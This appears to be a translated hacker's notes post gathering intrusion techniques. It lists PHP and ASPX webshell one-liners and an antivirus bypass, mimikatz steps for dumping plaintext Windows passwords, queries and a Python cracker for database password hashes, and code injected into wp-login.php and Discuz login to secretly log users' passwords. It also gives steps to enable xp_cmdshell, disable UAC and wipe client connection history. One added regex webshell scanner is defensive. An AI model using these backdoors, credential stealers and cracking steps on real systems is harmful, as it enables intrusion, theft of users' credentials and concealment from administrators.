// dangerous include: compiles and runs any file as PHP
3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// copies an uploaded file to any name, i.e. unrestricted upload
4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// China Chopper one-liner, same trick as 1 under a different variable name
5. include ($uid);
// dangerous include: compiles and runs any file as PHP, fed via POST

// one-liner embedded in a GIF
6. Typical one-liners
Backdoor code
<?php eval($_POST[sb])?>
(The post writes eval_r; PHP has no such function, these use eval.)
Code
<?php @eval($_POST[sb])?>
// error-suppressed variant
Code
<?php assert($_POST[sb]);?>
// use the expert mode of lanker's one-liner client to run PHP statements through it
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
// variable function call: sa names the function to run (e.g. assert), sb and sc are its arguments
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, when setting up the connection in the China Chopper client enter the following in the "config" field
Code
<O>h=@eval($_POST[c]);</O>
Code
<script language="php">@eval($_POST[sb])</script>
// one-liner that gets past filtering on <?
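The note above keeps these one-liners for keyword hunting; the following scanner is an added example (Python, written for this page, not code from the original post or from any webshell scanner) that turns the list into signatures and runs them over a few constructed PHP snippets. The rule names and the sample file names are made up for the example. The include() samples above taint a variable first and include it on the next line, so one rule tracks that assignment instead of matching a single line.

```python
import re

# Signatures distilled from the one-liners listed above. Names are labels
# chosen for this example, not any vendor's detection names.
REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)"
RULES = [
    # eval/assert/system fed straight from request data: @eval($_POST[sb])
    ("eval_of_request",
     re.compile(r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*@?" + REQ, re.I)),
    # preg_replace (or a variable holding its name) called with the /e modifier,
    # which evaluates the replacement as PHP: $hh("/[discuz]/e", $_POST['h'], ...)
    ("preg_replace_e",
     re.compile(r"(?:preg_replace|\$\w+)\s*\(\s*[\"']/[^\"']*/[a-z]*e[a-z]*[\"']", re.I)),
    # function name built from one-character strings: "p"."r"."e"."g"...
    ("concat_built_name",
     re.compile(r"(?:[\"'][a-z_][\"']\s*\.\s*){3,}[\"'][a-z_][\"']", re.I)),
    # variable function where both callee and argument come from the request:
    # $_POST['sa']($_POST['sb'])
    ("variable_function_on_request",
     re.compile(REQ + r"\s*\[[^\]]+\]\s*\(\s*" + REQ, re.I)),
    # include/require straight from request data
    ("include_of_request",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*" + REQ, re.I)),
    # <script language="php"> used to dodge filters that only look for "<?"
    ("script_language_php",
     re.compile(r"<script\s+language\s*=\s*[\"']?php[\"']?\s*>", re.I)),
]

# $filename = $_GET['xbid']; include($filename);  -- track the tainted variable
ASSIGN_FROM_REQUEST = re.compile(r"\$(\w+)\s*=\s*@?" + REQ + r"\s*\[", re.I)
INCLUDE_OF_VAR = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)\b", re.I)


def tainted_include(src):
    """True when a variable assigned from request data is later included."""
    tainted = {m.group(1) for m in ASSIGN_FROM_REQUEST.finditer(src)}
    return any(m.group(1) in tainted for m in INCLUDE_OF_VAR.finditer(src))


def scan(src):
    """Return the sorted rule names that fire on one PHP source string."""
    hits = {name for name, rx in RULES if rx.search(src)}
    if tainted_include(src):
        hits.add("include_of_tainted_var")
    return sorted(hits)


# Constructed samples mirroring the list above, plus one benign file.
SAMPLES = {
    "config_inject.php": '<?php\n$telok = "0${@eval($_POST[xxoo])}";\n$username = "123456";\n?>',
    "preg_e.php": ('<?php\n$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n'
                   '$hh("/[discuz]/e",$_POST[\'h\'],"Access");\n?>'),
    "lfi.php": "<?php\n$filename=$_GET['xbid'];\ninclude ($filename);\n?>",
    "varfunc.php": "<?$_POST['sa']($_POST['sb']);?>",
    "script_tag.php": '<script language="php">@eval($_POST[sb])</script>',
    "clean.php": "<?php\n$name = htmlspecialchars($_POST['name']);\necho 'Hello, ' . $name;\n?>",
}


def scan_all(samples=SAMPLES):
    """Map each file name to the list of rules it triggers."""
    return {fname: scan(src) for fname, src in samples.items()}


if __name__ == "__main__":
    for fname, hits in scan_all().items():
        print(f"{fname:20s} {', '.join(hits) or '-'}")
```

Run it over a real tree by feeding file contents to scan(); a hit on concat_built_name alone is worth a manual look even when no other rule fires, because it is the obfuscation step that hides the call names from plain grep.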

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory; psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the plaintext password
7. Leave with exit; do not just close the window, or the system will crash.

http://www.monyer.com/demo/monyerjs/  fairly complete JS decoding site
Automatically check for missing high-risk patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
(Each hotfix in the list that systeminfo does not report is printed as not installed.)

ASPX one-liner backdoor that gets past SafeDog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
(The cookie name 你的密码 is the placeholder for your password. The client sends the length of a .NET assembly in that cookie and the assembly itself in the request body; the page loads it and instantiates its class "c", passing the page object, so nothing that looks like a shell command ever appears in the file.)
Logging WordPress login passwords from a webshell (to feed further social engineering)
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
The logging code fires when action=login; you could also put it in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it right below; the captured passwords accumulate in pwd.txt next to wp-login.php.
Modifying wp-login.php is not really a good approach since it is easy to spot; there are other ways, noted here for the record.
Bypassing SafeDog with the IIS 6 file-parsing vulnerability:
;antian365.asp;antian365.jpg
(IIS 6 stops reading the name at the ";", so the file runs as .asp even though the upload filter sees a .jpg.)
Grabbing the hash of the highest-privilege account from various databases and cracking it
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
Crack the upper case hash in Cain & Abel first (its keyspace ignores letter case), then work out the case-sensitive hash.
SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
Crack the case sensitive hash in Cain; try brute force and dictionary attacks. (2005 dropped the upper-case hash, so there is no cheap first pass.)

Update, following bernardo's comments:
use the function fn_varbintohexstr() to cast the password to a hex string, e.g.
select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MySQL:

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-character hex string for MySQL versions prior to 4.1, and a 41-character string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

* MySQL < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

* MySQL >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

select user, password from mysql.user
The hashes can be cracked in Cain & Abel.

Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
The stored value is md5(password || username) with an "md5" prefix, which is why the username is appended when cracking. Use mdcrack:
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:
select name, password, spare4 from sys.user$
(password holds the legacy DES hash, spare4 the 11g SHA-1 "S:" hash.)
The hashes can be cracked with Cain & Abel or thc-orakelcrackert11g.
More on Oracle later, I am a bit bored....
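The hash layouts broken down above, as an added example in Python (written for this page; not code from the original post or from Cain, MDCrack or any other tool it names). It parses the two SQL Server layouts, rebuilds them from a password and salt, computes the MySQL 4.1+ and PostgreSQL forms, and runs the "crack the upper-case hash first, then settle the case" workflow over a constructed word list. The salt is taken from the SQL Server 2000 hash quoted above; the sample password Secret1 and the word list are assumptions (the page's real sa password is unknown), and the hashes quoted from the page are used only to check the parser.

```python
import hashlib
import itertools

# --- SQL Server 2000 / 2005 -------------------------------------------------
# "0100" header, 4-byte salt, SHA-1 over UTF-16LE(password) + salt.
# SQL Server 2000 appends a second SHA-1 over the upper-cased password;
# 2005 stores only the case-sensitive one.

def _sha1_utf16(password, salt):
    return hashlib.sha1(password.encode("utf-16-le") + salt).hexdigest().upper()


def mssql_hash(password, salt, with_upper=False):
    """Rebuild a pwdencrypt-style hash; with_upper=True gives the 2000 layout."""
    if len(salt) != 4:
        raise ValueError("salt must be exactly 4 bytes")
    out = "0x0100" + salt.hex().upper() + _sha1_utf16(password, salt)
    if with_upper:
        out += _sha1_utf16(password.upper(), salt)
    return out


def parse_mssql_hash(hexstr):
    """Split a value from sysxlogins.password / sys.sql_logins.password_hash."""
    s = hexstr.strip().replace(" ", "")
    if s[:2].lower() == "0x":
        s = s[2:]
    s = s.upper()
    if s[:4] != "0100" or len(s) not in (52, 92):
        raise ValueError("not a SQL Server 2000/2005 password hash")
    parts = {"header": s[:4], "salt": s[4:12], "case_sensitive": s[12:52]}
    if len(s) == 92:
        parts["upper_case"] = s[52:92]
    return parts


def check_mssql_password(hexstr, candidate, case_insensitive=False):
    """True when candidate reproduces the hash (exact case unless told otherwise)."""
    p = parse_mssql_hash(hexstr)
    salt = bytes.fromhex(p["salt"])
    if case_insensitive:
        if "upper_case" not in p:
            raise ValueError("only the SQL Server 2000 layout carries the upper-case hash")
        return _sha1_utf16(candidate.upper(), salt) == p["upper_case"]
    return _sha1_utf16(candidate, salt) == p["case_sensitive"]


def crack_mssql_2000(hexstr, wordlist):
    """Two-phase attack described above: match the case-insensitive hash with a
    word list, then enumerate letter case only for the word that hit."""
    p = parse_mssql_hash(hexstr)
    if "upper_case" not in p:
        raise ValueError("two-phase cracking needs the SQL Server 2000 layout")
    salt = bytes.fromhex(p["salt"])
    for word in wordlist:
        if _sha1_utf16(word.upper(), salt) != p["upper_case"]:
            continue
        for flags in itertools.product((False, True), repeat=len(word)):
            cand = "".join(c.upper() if f else c.lower() for c, f in zip(word, flags))
            if _sha1_utf16(cand, salt) == p["case_sensitive"]:
                return cand
    return None


# --- MySQL >= 4.1 -----------------------------------------------------------
def mysql41_hash(password):
    """PASSWORD() for MySQL 4.1 and later: '*' + SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# --- PostgreSQL -------------------------------------------------------------
def pg_md5_hash(password, username):
    """pg_shadow.passwd: 'md5' + md5(password || username); the username acts as
    the salt, hence MDCrack's --append=testuser above."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def check_pg_password(stored, candidate, username):
    return stored == pg_md5_hash(candidate, username)


if __name__ == "__main__":
    # Salt from the SQL Server 2000 hash quoted above; password and word list are
    # assumptions for the demo.
    salt = bytes.fromhex("34767D5C")
    h = mssql_hash("Secret1", salt, with_upper=True)
    print(parse_mssql_hash(h))
    print(crack_mssql_2000(h, ["password", "secret1", "admin"]))  # Secret1
    print(mysql41_hash("mypass"))  # *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
```

The point of crack_mssql_2000 is the cost split: the word list phase runs against the case-folded hash, and the 2^n case enumeration is spent only on the single word that matched, which is exactly the sequence the note recommends for Cain.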
Enabling xp_cmdshell in SQL Server 2005/2008 (it is off by default in those versions):
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing the SQL Server 2008 client connection history (Management Studio's recent-server list, not the server log); back it up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the matching entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.
Last edited by simeon on 2013-01-03 09:51

Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
Step 1: check whether the right-click menu has a "Take ownership as administrator" entry. If it does not, import the following .reg; it adds the entry for files, .exe files and directories, and the command it runs is takeown followed by icacls granting Administrators full control:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import this .reg to get the "Take ownership as administrator" right-click entry on Win7.
Step 2: search C:\Windows for notepad.exe; you should find four notepad.exe and four notepad.exe.mui.
1. The notepad.exe directly under C:\Windows does not need replacing
2. The notepad.exe under C:\Windows\System32 does not need replacing
3. Leave the four notepad.exe.mui alone
4. The ones to replace are the notepad.exe in C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take ownership of those two folders, then rename Notepad2.exe to notepad.exe and copy it into both.
Afterwards go back to the desktop, create a new .txt file and open it to confirm the editor has changed.
Disabling UAC on Windows 2008 (EnableLUA=0; takes effect after a reboot):
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below. It writes csslog.php under the site's ./data/cache/ directory automatically.
You can add a view.php under the ipdata directory to read the records; password: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $_SERVER['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>User:".$username." Password:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);
fclose($handle);
(The leading <?exit();?> makes a direct request for csslog.php return nothing, so the records can only be read from disk, e.g. by the view.php mentioned above. HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are client-supplied headers, so the logged IP is whatever the visitor chose to send.)